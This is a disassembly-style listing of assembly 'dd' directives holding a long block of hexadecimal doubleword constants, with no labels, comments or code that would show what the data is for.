		dd 35F9001h, 0E7493E6Fh, 0B463D33h, 0DA72763Ah,	0AE426A20h
		dd 56F37F32h, 0DB4AD86h, 92F6281Dh, 0B55A9AD1h,	1F2F92EDh
		dd 24FE5FB0h, 90A53348h, 0B1D697D8h, 4E5DCCB8h,	43984815h
		dd 0F048AEFEh, 0BEDB4ADAh, 87E3D525h, 85AC85DCh, 4B9BB1Ch
		dd 70EF9153h, 68329E05h, 9783A5C8h, 0C8BF8E24h,	39458C46h
		dd 86FE88BFh, 4460CCD3h, 724CFB7Eh, 0A04A593Eh,	5081279Dh
		dd 2BB95BA1h, 3B9BBC20h, 957FE9EEh, 941E1EBDh, 0E1473860h
		dd 221E57C1h, 89B598D2h, 0BD4FD0Ch, 0A4B3EE84h,	0DF496161h
		dd 585F31C0h, 2EFA48C6h, 0EB554109h, 0AD682E1Ah, 0A888F5DAh
		dd 0F0FB665h, 67A49379h, 9EC17CFh, 386AE0CFh, 598D3F92h
		dd 1169F16Eh, 7C1FC7Bh,	6AF33D42h, 70F178DCh, 805B9099h
		dd 1E3BE265h, 4DE584B7h, 0FE62EEC1h, 0F4391302h, 2A7F9ED8h
		dd 0F1FFAE0h, 210B9579h, 0C3EED806h, 0B386DA5Dh, 38AF1AFDh
		dd 511456B4h, 0E9E4F05Dh, 3F7AB35Ah, 2FF60BCEh,	0FB59F5A5h
		dd 9B44E962h, 0F74050D4h, 5138313Eh, 0A80E4517h, 38EA16B1h
		dd 0CEBC078Bh, 0FC42D578h, 0ED41D450h, 7ACC8F54h, 0CECD3757h
		dd 7BB14168h, 7B7436E9h, 0E516A0C8h, 0CDB3AF25h, 6B7A17A0h
		dd 1EC4EE79h, 0EA359BF3h, 946714D7h, 0AEE91067h, 0CAE9092Eh
		dd 3D855322h, 17678095h, 0D84FA3A2h, 0A2316E7Bh, 0B034EB76h
		dd 9A666595h, 0CE7E89CDh, 0C39926F5h, 5A1708BFh, 0CD5029DDh
		dd 99B9EEh, 5AADD770h, 67FE1126h, 95E1CEC5h, 0F584DA77h
		dd 91C11C92h, 7507D31Bh, 0B28EA0AAh, 5EDDBFC8h,	9EB271FFh
		dd 0B2DADDE9h, 288D3FE0h, 14A8D686h, 0CCCFA31Dh, 83F4659Eh
		dd 0BBDD6DB7h, 5D6666A4h, 0E2FA0AD1h, 350F16C8h, 7E950A10h
		dd 37E658E4h, 3B5208EAh, 0A968FEAEh, 305DBE54h,	0F5E8975h
		dd 556FD6AFh, 0AA7ECA23h, 0B478D222h, 9D3A4A17h, 4A2274DBh
		dd 0DBB3AD6Fh, 9F6D95DCh, 607A408Eh, 874A129Ch,	698CB379h
		dd 57539CC4h, 7DFDC45Ah, 0B39B9789h, 0CEB4F3B7h, 73087F0Ch
		dd 0CD65C877h, 0FF18D0AFh, 86155DC8h, 0D7DADFB4h, 25DAEBD4h
		dd 1F59ACF8h, 2D07E84Fh, 82ACCD8Dh, 0A914F234h,	0CA89405Bh
		dd 0FAB4E386h, 34E715DDh, 0E1B66EA8h, 5496A3D3h, 0C074A3Eh
		dd 759B5A2Eh, 431727CDh, 955A1239h, 749E4A6Ah, 0B431534h
		dd 0CB5F3F35h, 750003CAh, 8BE974F0h, 0D82DEA6Bh, 0E2A5C3F1h
		dd 0B8ACA359h, 45C5C149h, 0F97D4E16h, 3AB79B9h,	0AD47C776h
		dd 0E95FF682h, 0ED4AB981h, 6903B9D1h, 14F9FB61h, 469DB22Ah
		dd 0DA76FEB6h, 366AED1Ah, 0A895F7B8h, 8283889Fh, 0D40BC994h
		dd 3C5CBEF1h, 7796F032h, 6745B44Dh, 488E1B7Ah, 9CE39D5Fh
		dd 7EBE8442h, 0AF0913D1h, 5153EB7Ch, 1E4C6940h,	0AA7FBE58h
		dd 0CEB96E0Ah, 380F91C9h, 0A5C7D2F1h, 0E155B880h, 0EB53D1F7h
		dd 2F67EB3Ch, 0FE3973Dh, 8D31CD2Eh, 0B388A612h,	364E7444h
		dd 55BF2B0Ah, 0DBD21BC3h, 4D9B7D9Fh, 7C139894h,	0D5C0A1A4h
		dd 0F01D2352h, 0CC63F4B5h, 5EEFF040h, 4AF5BD1Ch, 2B5C68D0h
		dd 0A7780B8Eh, 0F7957025h, 18BFCF22h, 342B423Ah, 0EE97D1EFh
		dd 0E4472F28h, 59F13BE7h, 6A59A32Bh, 0F91FB733h, 8260870Ah
		dd 284531F5h, 0ABF2C767h, 1FB17869h, 0F1A5851Dh, 0AA5DA5E2h
		dd 37394D9Bh, 6F531558h, 9D99FF1Dh, 0E67E173Fh,	4B2FAF8Dh
		dd 89D4A288h, 52578739h, 0FC8CC5D5h, 49433D8Eh,	34A762AEh
		dd 0FB6ED9Ch, 6B06D411h, 34D07181h, 0DDE6572Fh,	6488793Eh
		dd 4353EBC6h, 0E796E2B9h, 0F0BF9385h, 0E2908F06h, 0DF2DC60Dh
		dd 7619F799h, 0A2F3B24Bh, 2DABEEBDh, 2F3B6108h,	7D6A19FDh
		dd 0E8E532F5h, 0A9999C65h, 9C2569FEh, 3DD67790h, 63570AA7h
		dd 78DB272Fh, 0F2AAB445h, 0DCCDD95Ah, 797D5E7Bh, 349A92BBh
		dd 0E15C01FEh, 1EB672C9h, 96177A0Fh, 8ED019F7h,	0FE72F5CDh
		dd 5B3466A5h, 9B504976h, 0A6BCABB7h, 1BDB3DEAh,	732CD7ADh
		dd 0D4D01280h, 0D255CEF0h, 0B40DF2F5h, 9D0BE983h, 0BF596CD3h
		dd 17F14D47h, 0D53B899Bh, 15575C28h, 0FF2B397Eh, 0D6BB359Bh
		dd 6457F3CDh, 0F3970B1Bh, 0AC1AFDF0h, 178DFB69h, 0C0DB7996h
		dd 0A2F15E65h, 0AED26311h, 0CF55F386h, 52E486A9h, 0CE7026DBh
		dd 786C17FDh, 0ACDBFF65h, 0CF2229ACh, 9FBE4A1Eh, 80615FEFh
		dd 1CF2F36Ah, 375E149Eh, 852A2850h, 0BAD3D6B4h,	0EEE30A6Ch
		dd 0B9872602h, 55CB22D2h, 0F2BECE70h, 3797BD2Ch, 0DBC8BBBh
		dd 89818CCCh, 0AC592AB7h, 56B160E8h, 327E8525h,	23D760EAh
		dd 0E2EA61F1h, 903859D0h, 1AFBBE82h, 0EB1DB4F6h, 0CC5A0DC3h
		dd 5F25067Eh, 34A606AAh, 0AEA84F09h, 0BA5D9986h, 48384744h
		dd 37255558h, 6BFE5DBDh, 85149071h, 6036F2FDh, 0C7A2DF2Dh
		dd 0D81DD909h, 0CBD78BFBh, 36AF46C7h, 91FF0E25h, 0F449F1C2h
		dd 55395704h, 15D87FBAh, 6FB4EED3h, 7AE55428h, 0C6AA174h
		dd 0CD7F7CFDh, 7AEFEBD1h, 49B00D4Bh, 0EA8F5EC9h, 5D0DC0F9h
		dd 74B4F99Ch, 0BCDFCBCDh, 749C73A3h, 3E0F7BB0h,	0F0D78FB4h
		dd 0BDB1792Fh, 98075DE0h, 0C4314DCDh, 0C570DEB6h, 0FBC6916h
		dd 49CE2099h, 21E67046h, 0A276255Bh, 0A148E0FBh, 724A8DB6h
		dd 945AB526h, 2E88DAEAh, 0F63FC663h, 5D7455FDh,	5705D86Ch
		dd 3055C711h, 2F29DC63h, 0CBFE251Ah, 1DE8EB50h,	6C57241Bh
		dd 4B9F664Fh, 0ECD2E2ACh, 5C70AA82h, 8C541847h,	0AD5B52FBh
		dd 63B16D1Ah, 0ADE187E0h, 640D222Ah, 0B3AB5C2h,	8BAB5EDh
		dd 4C7046E6h, 0ECAD9282h, 0FAC80891h, 4ABD5AD1h, 6273507Eh
		dd 22C99511h, 0A597B87Eh, 0F6669864h, 0F8CC0C94h, 0CFD9F83Eh
		dd 0ADAC4F90h, 90BC44FCh, 0B19A2716h, 0D0B494B6h, 5DCE9389h
		dd 515B75F2h, 96CD2A8Dh, 1A1F9072h, 6743A9B5h, 2C4A82A0h
		dd 0C0FCC1D5h, 78F7E566h, 6C97ED9h, 5A5598BFh, 3B2E8BE9h
		dd 75671726h, 1285B44Bh, 0BB9F71ABh, 7B6532ABh,	83EA17E0h
		dd 0E7CC731Ah, 92AA6AE5h
		dd 7B5BE366h, 64D42C6h,	33128DAAh, 0D5631556h, 0AD3DFCC5h
		dd 0CEAF58D2h, 7DBAB626h, 737AE046h, 0B2F4999Ch, 716C4B25h
		dd 0FEEA6FE4h, 0EFC99FFBh, 7BE40408h, 6B0D1661h, 0BC6E9903h
		dd 7A1071FAh, 3343550Dh, 0AA8FCFCCh, 9BC20191h,	189183C2h
		dd 0CD7B8C38h, 279691BBh, 0F8D25918h, 0DF9260EFh, 878C00B2h
		dd 53CB0D7Fh, 0EDA3E62Fh, 0ECD8190Ch, 46E129B1h, 687616BDh
		dd 29338BC8h, 77A39DE3h, 0F2BDCB7Ah, 69CE6DC1h,	0AAED8AD1h
		dd 1064EE75h, 88FDDD55h, 0F1717E07h, 0FE0A1763h, 97BE80A9h
		dd 3925EE07h, 0F8EFC350h, 0A803F878h, 0A568760Ch, 0F6EC353Fh
		dd 29B527A8h, 0BC4F1C64h, 93210616h, 0BFC2514Dh, 9A7AE43Bh
		dd 7B2EF0B2h, 0A34F406h, 3D31D3C8h, 8A2AC92Bh, 9A94AE06h
		dd 42730A97h, 0DA1274F0h, 92F13273h, 8C958E25h,	0CA8CF5F4h
		dd 0C3258AF9h, 41235DB5h, 6EB281F9h, 671F84E1h,	0AE92A85Bh
		dd 0C3B238A8h, 0C245C767h, 53D873B4h, 0EDB7A470h, 149803D6h
		dd 5010C39Bh, 0E23E595Fh, 1B2B0A7Ah, 5A246729h,	0B6A966A8h
		dd 0ABABF8AEh, 5D539BEAh, 0D575E7C2h, 22D784BFh, 9B8D64C9h
		dd 2AA14641h, 0BF2B1155h, 0F668E2A9h, 63E921F7h, 4FF7F15Eh
		dd 0D8348AB9h, 0E61E968Eh, 0B5B8BE48h, 49E26E07h, 0E3C85A53h
		dd 0C4F85EEAh, 0AF80D7Dh, 95511909h, 1C1EAA45h,	0C96EB8AFh
		dd 8E315C45h, 0FA00B2A8h, 9F899E33h, 1B4EAE44h,	0CE54C608h
		dd 0FFA1E150h, 5A1FED3Ch, 0ABB8299Fh, 9B778C9Ch, 5FECB395h
		dd 0C0DBC3FAh, 67755B87h, 0ADA297F3h, 58EF169Ch, 51562F48h
		dd 4ED4FDEh, 0E917AC8Fh, 4313D9CEh, 0AD2C89D6h,	0B1E99B55h
		dd 99526232h, 0C9F84CD7h, 301083ACh, 0A7D5CBFEh, 0F0FC5B62h
		dd 9ED94D31h, 0DBAB3D7Eh, 1FB8D980h, 5154C692h,	0A7CF3204h
		dd 0ED9F3C9Ah, 523CC0F1h, 8295D030h, 3D3AF32h, 87E30774h
		dd 83431503h, 0FF7E7B8Fh, 11BD5EB2h, 0DBD23C77h, 88BCE638h
		dd 5D511626h, 14C77EB8h, 0F5596E1h, 0FB15DA45h,	0E85C03C5h
		dd 16DD6D8Ah, 8EB9150Ah, 14DA6A01h, 0BEB6A463h,	12AEF6E5h
		dd 7ED6F6AFh, 87B3D5C6h, 0FA4148AAh, 0EAF077Dh,	420F42A2h
		dd 4AACA1C8h, 81AB5215h, 0F1D42DE2h, 0B7844629h, 0ECF9042Eh
		dd 8793FF15h, 0FFBF1377h, 0FF7019F8h, 9196EA80h, 0CC67D774h
		dd 0A8DAFF4Fh, 3B0F61F8h, 93528029h, 0FE5ACDFFh, 0FC555717h
		dd 0BAE22338h, 36A64264h, 907C95BBh, 6996ABB3h,	0FFAB3391h
		dd 29E1F974h, 0B415BCF2h, 0FCC3A99Fh, 0EE2FF84Ah, 0D973634Eh
		dd 0D2AB1365h, 4666A868h, 578694FBh, 995CA0CBh,	0FD803400h
		dd 0BF070979h, 0DAB3A7D8h, 7D07B3D4h, 0C85F3A7Eh, 0E8B8265Bh
		dd 94E6BE1Ch, 0D52FB476h, 58871B75h, 5CE30B09h,	2FB5E225h
		dd 3641C655h, 0CE2920F5h, 487C9B52h, 0D935F2DAh, 1BFD9DA9h
		dd 10D37C76h, 80D6057Dh, 1A467CB9h, 968932CFh, 3C595196h
		dd 43427CF0h, 9CE93416h, 80752FCEh, 0C37AF0Bh, 9793C691h
		dd 5F436A74h, 1B8D98E5h, 899F159Bh, 0FA12D234h,	99729F7Dh
		dd 685F3EC3h, 0C4C640CCh, 298242DCh, 0FD7E15D2h, 0C78B965Fh
		dd 0FDA16CDBh, 94AB174Bh, 29B113FDh, 6F24BD84h,	81E874E4h
		dd 0DEE8D21Fh, 221CED15h, 4C6EAE0Fh, 0EB2AE7F5h, 8BF44BA7h
		dd 2F37A038h, 0B9100406h, 0E4EA4ECAh, 1EC7A1ABh, 0D6538CD8h
		dd 0CA96CFF6h, 0E951A1F8h, 0C9CE9455h, 0F7356644h, 368A7F44h
		dd 5A9A75EEh, 5BA0E9C6h, 0B9622D34h, 0C7D54F56h, 0B30663A9h
		dd 0A4B3F662h, 0B299B9B6h, 5CE7EC23h, 5E33A817h, 5F150FCh
		dd 7ABEDE07h, 8EDEE615h, 81F830FFh, 756596B3h, 0FDF6E33Ch
		dd 9D87A23Ah, 0C855E0FAh, 80DD4A2Bh, 1F312E1Eh,	0B951C0A7h
		dd 0C2504A07h, 0B1E00C4Fh, 7746622Ah, 33F6CA0Ch, 0F92E7388h
		dd 943B6924h, 0EE1EB3CAh, 9866D540h, 0D93CC459h, 705FCC71h
		dd 0C3622CDEh, 5BFDEF3h, 708B9B72h, 0D02496F1h,	0E24A3C33h
		dd 0E37B5E90h, 513ED3DDh, 0B11A4D32h, 0E1D60C51h, 7C37E341h
		dd 0B5FB92DCh, 0F447AC6Dh, 8D067333h, 0B45DB172h, 0D03EFE2Eh
		dd 414A7DCDh, 6AD61C1Fh, 227226F2h, 0C6790006h,	0A12B4B24h
		dd 81831C7h, 0C8AFC2Ah,	58E80A3Eh, 8B3DAE31h, 78B0CC40h
		dd 6AD7E170h, 118D3C0Fh, 0AE4E08D7h, 82CAFE6Bh,	5ADFA3F0h
		dd 5CA986D5h, 8D9491EAh, 0D2EB22EBh, 0AF7336C8h, 4E9CBDA2h
		dd 0A2557A3Bh, 88FB658Ch, 0E4B42446h, 6958DD1Ch, 99066DDAh
		dd 9E579CA5h, 0E41AA0DBh, 0B292D8AFh, 0BE9C667Dh, 5D75D22h
		dd 70796244h, 0FC06DBEBh, 0FB62B510h, 0AE2E666Eh, 7C708A12h
		dd 9FF5E75Ah, 41A0B72Fh, 5ABA75A3h, 0F104414Bh,	17C42B99h
		dd 65F936FCh, 0FCDCB330h, 8D04C945h, 0B73399FDh, 999E7054h
		dd 4FC1D5CEh, 0B0D2ADEAh, 0B34F8904h, 1CD000B7h, 49F95E24h
		dd 0FD51F45Dh, 285E3280h, 8FE8CBB8h, 490938B5h,	0F2F193EAh
		dd 1DCCFE88h, 3C6873B0h, 0DC6B47B8h, 0CF975607h, 0F1DC69EFh
		dd 7D593D19h, 0CA518F2Dh, 0A31EB2ABh, 0FE6B83DAh, 8150D340h
		dd 5BA76731h, 3C549BE3h, 0C87E4F3Eh, 5011B15Ah,	0BE2C3254h
		dd 0E8503772h, 0EB99ED5Fh, 0B7017E67h, 0F0F9A89Ah, 6879D275h
		dd 7A774EACh, 0CBF337DCh, 0EE5F38BFh, 911ED497h, 0B6D92A4Bh
		dd 8E3F3BC0h, 0C60AFD31h, 7C1EDB78h, 0CE965C3Bh, 0A2615475h
		dd 4D6390BFh, 6F9881B2h, 0E59B5ABFh, 9261ED4Ch,	155C03EBh
		dd 5D798B5Fh, 14BEAB82h, 0F5F0E1EFh, 0A15C83A2h, 0E8177850h
		dd 0CC1EE94Dh, 0B70F87D2h, 0D99C32A9h, 74F14C65h, 0A77BE779h
		dd 6083F4C1h, 0A2BA0CD6h, 40FC5D08h, 57474118h,	0E6006011h
		dd 0B1287BFCh, 77095E62h, 88C74C5Ch, 0F738838Fh, 4FA19804h
		dd 0FA204C30h, 9A58B8h,	6170FE3h, 23D9606h, 9A90A10Ch
		dd 546014Fh, 2809F982h,	10800135h, 1988FCFAh, 853C0948h
		dd 0E0D2F991h, 1E6B0AF3h, 0ABE9061Dh, 0C4630378h, 38C6263Ah
		dd 22AD4C02h, 30202A3h,	5670A65h, 0D8EB09A0h, 3B34D034h
		dd 0A2B9E860h, 3F2DE1A8h, 89707270h, 0E06AED1Bh, 0BBDC85FEh
		dd 27999625h, 86013F38h, 2AB67D03h, 84A45925h, 72F3A5BEh
		dd 43FE14C5h, 1C352259h, 0F38155Bh, 6D17307Ch, 0B91BEF37h
		dd 855587E3h, 0CB6111Fh, 8987B03Fh, 52F02F0Dh, 48BAE32Dh
		dd 0E2A2B409h, 0E4B05D59h, 0D9D93E3Ah, 0E6368FC7h, 1738DE41h
		dd 15D32C5Fh, 7BBA1117h, 46263489h, 0A42A957Bh,	73D5AB20h
		dd 17FF3046h, 9079D9F2h, 6E3BDD2Bh, 62FD425Ah, 8F42F4EBh
		dd 0FF2275B7h, 581E37EAh, 0AFFA7275h, 0CDBF051Bh, 6DC3B4CCh
		dd 13CA1F4Dh, 0CDC7F0D5h, 5FA9AD68h, 0AC98B74Fh, 790A77CAh
		dd 575A0F4Fh, 78243F2Bh, 30576289h, 0FEFFE211h,	7CEDCB7Eh
		dd 0DA2CB48Ah, 0F66553D6h, 4E8DBBA7h, 0D5E95246h, 0E487E8E0h
		dd 5D36BA30h, 6F5DE0B3h, 0EEF324DBh, 3B285564h,	0B4CAC3F1h
		dd 6E25D2F6h, 6B6B44CAh, 65CDAFD0h, 0DC935DF1h,	0F3BA074Dh
		dd 0A0D8AB47h, 9CE927C6h, 136E1B0h, 6F229F44h, 42528FACh
		dd 0D43496FDh, 0BD59EAB4h, 1136A26Ah, 5D6D8B7h,	160A7312h
		dd 17D0B234h, 0A2DC42A0h, 8D305A02h, 544A9A0Ch,	0C1C4896Ch
		dd 0D4CB7475h, 0CBAD3937h, 0EB65D0F6h, 0E7FC3135h, 96F63ED1h
		dd 0D7698E10h, 2BC8C4B7h, 2AC8DC48h, 14EE867Bh,	547D2A78h
		dd 6C48380Eh, 8EC91BCAh, 272C216Fh, 79F8F956h, 0AB05D475h
		dd 5FC313F8h, 0E0954214h, 6B7162D6h, 8FAA195Bh,	53EE546Ch
		dd 0FD81CD02h, 2EB1CB5Dh
		dd 21C5CE6Eh, 7F4C77FEh, 56DABF04h, 571DB3C9h, 0E990B183h
		dd 0D08040ACh, 5F6166B7h, 4C99B2E5h, 926CDC98h,	0D6C29C2Dh
		dd 0A019E935h, 2093ADECh, 18D02D1Bh, 5EC391C4h,	9D096C75h
		dd 0EDABF97Eh, 0F4CAC457h, 9E0B2FE2h, 72AAEFF2h, 266DDC4Bh
		dd 0A8D479ADh, 2C7CE212h, 3094895Ah, 0DD50E2B4h, 0B851F116h
		dd 2B6F3824h, 0EA38B35Fh, 0D8735288h, 0A1E245D7h, 7B5BBB19h
		dd 12DC15A5h, 0AACCF8B4h, 0B6F2E3BEh, 0C9E959A7h, 0CDD5E3AFh
		dd 3DFFEB86h, 3F50FB9Ch, 6C2C9CD5h, 0FB4B0796h,	0C6F674C3h
		dd 0FD742322h, 0D14836A5h, 246D64E0h, 2AFAF35Bh, 69B12A96h
		dd 0E83FBE9Bh, 0EF198A31h, 462A1C64h, 0EC06687Bh, 96820FE9h
		dd 2363A7BFh, 0B7561AE7h, 275D853Ah, 1A493EA2h,	0CB83C191h
		dd 78C63B00h, 0ABB6B6E0h, 0C68A30FEh, 7BEFEDA4h, 0A7BBCF9Ch
		dd 3F171C66h, 0BA605FC9h, 6AC56B90h, 4B1718ECh,	45C745D3h
		dd 9633596Fh, 768F7D99h, 0B6F2BED7h, 0D4854D26h, 0F2AEB9D8h
		dd 0AE4C8023h, 0A5BB2593h, 6DE6A9FEh, 37A9F12Ah, 0AC266D06h
		dd 0F88A5403h, 5C1F52D1h, 339D51E9h, 0BAE16C3Fh, 39307D0Ah
		dd 0A9BE7B67h, 5D4E3564h, 34E844A8h, 4F730F22h,	0BF488DE6h
		dd 0F32F308Bh, 0D29A24DAh, 4A42A332h, 454916CAh, 79DBEACCh
		dd 0C8CEFA60h, 8BD93F3Dh, 0AD4C75ACh, 0DA258C3h, 0B9E2DACEh
		dd 0EB6A95D3h, 2FC70316h, 9F6E27C0h, 0DB0DEE15h, 8F591E85h
		dd 4E869174h, 683D76BBh, 631ECEAFh, 0B6BABDE9h,	5795BD09h
		dd 126A8BF9h, 0D69174AFh, 0A648D2C7h, 3558BB1Fh, 747AEBFDh
		dd 9B1A9B4Dh, 0F9B37061h, 0A9547DA6h, 0BC7CAC7Ch, 397F1E7Fh
		dd 56029920h, 8A3A8C9Ch, 5425FB97h, 0CBF0B064h,	43A63CD8h
		dd 5516A887h, 6CB4BFD1h, 0B3BB36E1h, 0B696550Ch, 1D6B3D77h
		dd 85FB2B3Eh, 3D4E2639h, 7F8C1DBh, 0D18E1947h, 4222D533h
		dd 73C09CBAh, 0C5FDF270h, 873062D1h, 0B1C51FFh,	729E592Ch
		dd 6A928745h, 0F731A1B4h, 0A53DEBD5h, 7DE16E73h, 1949B3A8h
		dd 0E4F5266Ah, 71275CF7h, 71D006CEh, 0F8FEC27Fh, 37CA5D55h
		dd 3B27BFD1h, 8E26D25h,	978B01D2h, 0CD0F887Ch, 42800471h
		dd 0DAB93EF0h, 0DF22E321h, 244508DFh, 4BA7BCB6h, 2B5DF06Ch
		dd 0BAFAAFE5h, 0BDD5F086h, 7CF8DE5Eh, 0C5F29E0Bh, 0E607C318h
		dd 8F933C49h, 0A949BE7h, 0A4515505h, 0EFF7BDADh, 811989A4h
		dd 6EAC4213h, 51834425h, 0D425F07Ch, 0B05EF839h, 65C3F9EBh
		dd 14C6639Bh, 32A814C5h, 0B933284Dh, 1750EE58h,	0F27CAC5Ch
		dd 3ADA78F5h, 5DEA7E1Ch, 0C8153D65h, 0A522E88Dh, 2FA8B2D6h
		dd 4E276EE1h, 2BFD344Ch, 7C72E08h, 0E0E85F9Eh, 7C469DA1h
		dd 4B59B0FCh, 0D15BB6C4h, 5C33614Eh, 0A0F65117h, 0F93DD0FDh
		dd 38DE3A32h, 0FCED1593h, 0C5D13CD9h, 7A090875h, 104DD222h
		dd 84D723EBh, 5A568FECh, 57F71BF7h, 0C8AE54EEh,	0EAFC5968h
		dd 0B19491C9h, 6A526769h, 1E9C2A9Dh, 317CA4B3h,	3C5DC2CAh
		dd 6DC244B0h, 2B068537h, 137538FBh, 8B3A13FBh, 972F04B3h
		dd 148A1F8Eh, 53FF7720h, 5DDF7D1Bh, 0DC0F1472h,	4B352AA9h
		dd 775D880Ah, 0AF4D4BBAh, 697BEFDCh, 0E8FA4C7h,	612D5468h
		dd 8B43D4D5h, 0AA748DB5h, 4807424Dh, 5022A63Ah,	0A251CD7Bh
		dd 0F68D6A80h, 0FD5BB173h, 5D432772h, 4F67F517h, 0F4CF76C0h
		dd 0A42D8A8Fh, 0B75A5D7Ch, 8D0AC05Fh, 7705994Eh, 4ED56726h
		dd 9C7C0096h, 249813E2h, 0AA45E168h, 86457C20h,	43294CAFh
		dd 332B327Ch, 29541FA3h, 92455669h, 914C5997h, 6394688Eh
		dd 0EF5629F9h, 2BAEBA48h, 336442FFh, 0FABDD3BFh, 48AA00B1h
		dd 320779F0h, 0F19CE729h, 4950D427h, 0AB6B127Eh, 0B2ABEC6Eh
		dd 5CA60497h, 21969ADAh, 5E2ECB82h, 0B240E4C9h,	0FD7EAF2Bh
		dd 9B038EB7h, 36CBF7CEh, 95DD51ADh, 4AF2A1Dh, 5BF32B9Ah
		dd 0F82CE0A4h, 8CEF8251h, 0AFDB8D2Ch, 0AB0378D3h, 0DF6B2847h
		dd 75D8D6A6h, 0FC085A90h, 23BE67BEh, 0F587EC37h, 0D29243FBh
		dd 0B4800726h, 2F858D52h, 0BE30AD6Eh, 8DC71A5h,	59D7854Bh
		dd 9A6542ECh, 0AC6F9A76h, 0FDDC5AC2h, 0EF513756h, 487EAD8Ch
		dd 0C777C72h, 759506ABh, 617D497Ch, 0E0C01B2Bh,	7D1E9EE9h
		dd 0D87AF2F0h, 87859279h, 113EC5B1h, 931AC8FAh,	173FBF07h
		dd 43F57F2h, 5DCED62Bh,	8E061B78h, 6ED3130h, 0B187544Eh
		dd 46EB85C4h, 1505DFB4h, 0AF31CE2Dh, 0DE7C4C25h, 195580A4h
		dd 65B9DD34h, 0F5DDC4E0h, 7373A6B1h, 354E1D46h,	24BABB37h
		dd 0CFA2A745h, 103CD4EAh, 1168707Ch, 14575D56h,	0B077E079h
		dd 0CDFD93BBh, 7A37AEBBh, 0DA2E5CD5h, 62FD30A9h, 0CA67BDBh
		dd 8F9F5596h, 7DF807E3h, 0CB7F12F3h, 96422F98h,	0F5DC7F7Ah
		dd 0E968CE8Ch, 0EEFE92D3h, 0AEBCE57Dh, 6B67A68Fh, 0C4241F39h
		dd 1F8E0894h, 0C89F8592h, 1F6563B2h, 0A240EB83h, 0BC0E9262h
		dd 0FDCA7E30h, 67836AC4h, 0FE86DA07h, 0DB49EE89h, 1B09559Dh
		dd 3B5B4F5Ch, 0D1BC3D54h, 1B447F3Bh, 6DB53DD5h,	0E24DDEE1h
		dd 39F8044Fh, 0A6C5239h, 51C9F6B2h, 5FFC6433h, 0D499DCA1h
		dd 0BD3AF6CBh, 0E91B3827h, 0AA028AACh, 4955A913h, 7483857Bh
		dd 54205DC3h, 6C79697Bh, 0FC0E9CB0h, 33419892h,	0EE327E6Eh
		dd 2C75048Ch, 0AAB76CAAh, 956FDAC8h, 0A2494FA3h, 0D0CC4B7Ah
		dd 182D8F35h, 8A543C11h, 0F3D08FACh, 9F4E48CAh,	3D696FDAh
		dd 0F892ABD0h, 91C2B52Eh, 87E0729Eh, 0C22E8411h, 1819F2D9h
		dd 86E4A31Bh, 134C8E85h, 1368B9D9h, 512DF637h, 0AAF4B3BBh
		dd 0D4D797B0h, 9231677Bh, 607D4A12h, 1E6703E1h,	59E5140Ch
		dd 3F0BEEC4h, 6729D2D1h, 2A04036Dh, 7ED625A0h, 0E3814D61h
		dd 8F8FEECAh, 33104FE8h, 0B32C232Ch, 0B479B46Ah, 0B34E8939h
		dd 931615F0h, 23170925h, 0FD52AB5Ah, 26FF88B4h,	0F1BB733Bh
		dd 0A67AFF50h, 46B7D3DCh, 0BC69C35Dh, 0D1377294h, 6CEAD37Ah
		dd 0EB303F7Bh, 28BE2787h, 0F595CA79h, 0E4CBD62Eh, 0AE634FAEh
		dd 2A317B58h, 0A15AF170h, 0DC3E8D99h, 7E1A3975h, 5656606Dh
		dd 0D5EDDC4Bh, 37B68AC2h, 0AF1112E6h, 99F1CBECh, 8AE58A42h
		dd 59198CF4h, 0EE0712B5h, 5E5E5620h, 87368219h,	5F2BAB62h
		dd 78E15C35h, 55D514F5h, 0FC35F869h, 86F46B0h, 79573E9Ch
		dd 121DEFAFh, 25EEDD2h,	0F5CE3E3Fh, 4E76D1ACh, 0B8A05A9Bh
		dd 955449DFh, 0AE7DC566h, 8B77A86h, 686C767Fh, 9F889611h
		dd 1318EB2Ch, 54915F47h, 4FBC5761h, 9325DC37h, 0AEFBF41h
		dd 5D675496h, 7DC1151h,	955DCC7Ah, 0EA0A4A1Dh, 0B62A3D41h
		dd 4C8F9F49h, 0FE559566h, 5ADF6439h, 0E6D558CCh, 0EF57647Fh
		dd 62A896Ch, 8154605h, 0C499436Fh, 503D06BAh, 70D044EEh
		dd 0F80ED689h, 0DC6074A1h, 0B8ABDE51h, 0F456135Dh, 69E11EE5h
		dd 0F09B5632h, 560944B2h, 0BB3A0EEFh, 460CE036h, 553D15E6h
		dd 0A562FF9h, 0B6AD2A83h, 1C634C12h, 0AD6D5558h, 0AB4643A7h
		dd 52EA4C8Dh, 0CC751516h, 0BEADC76Ch, 146FCC76h, 0FD68C0Ch
		dd 0C028F11Ch, 0CA2DF5B8h, 1AF17C52h, 29E25ED1h, 15011CB8h
		dd 69321E58h, 51DBB47Ah, 0DDE85EE9h, 0BF22636Bh, 340B738Bh
		dd 42B7777Eh, 8A5810C8h, 0A7E2F88Bh, 7C152AB8h,	0A168A2D0h
		dd 19B107F2h, 3EBB9EEAh, 0A97D1AFAh, 0A071ADEDh, 0C476059Eh
		dd 896A1F11h, 1A318132h, 82CB7EFh, 3577A1FFh, 0A4D81E57h
		dd 0FB1AEFD1h, 9688C507h, 0A636B282h, 277C0EE1h, 1AB5BA63h
		dd 6A2D2790h, 39B81FCh
		dd 5873FC87h, 552C5F2Dh, 0D241B8F8h, 8144D095h,	0D906CB7h
		dd 17E5212Bh, 26E2E114h, 8F07785Fh, 943FD1D6h, 0E4B7D98Ah
		dd 62120391h, 79D6CA77h, 2E2A1987h, 0B35F0B2Ch,	92F776CAh
		dd 2F9D1F43h, 85D7D438h, 72D181CDh, 4D829D65h, 3A855DD1h
		dd 97A6B0E3h, 0FEDB002h, 71BE7A08h, 367A93E9h, 17A5A832h
		dd 1D9FC8C3h, 0D3791E69h, 0F23DAFDFh, 2F3AE45Bh, 0C1F2DF9Eh
		dd 3F694FABh, 3CCAC4B0h, 6A7466h, 0C83DBA02h, 5E75786Ah
		dd 0B9711239h, 83DC2034h, 4319B83Eh, 0A20CFA4Eh, 0A6820156h
		dd 0B1F44C4Dh, 7ED0ED06h, 2CBF4BF2h, 0DDF9D26h,	0D7AAC7EFh
		dd 0DBF76DEh, 7732F1AEh, 5F87CD98h, 4EADB2F3h, 5384E373h
		dd 486A11A7h, 0C75A0597h, 0BBDAE64h, 2F943A03h,	0ABD6D7DEh
		dd 8F258FA0h, 3BA0D0A8h, 273DA243h, 0ED9D4359h,	85A35FCEh
		dd 208F9D03h, 0DE19D75Bh, 851EFC0Bh, 192462CFh,	3C687D65h
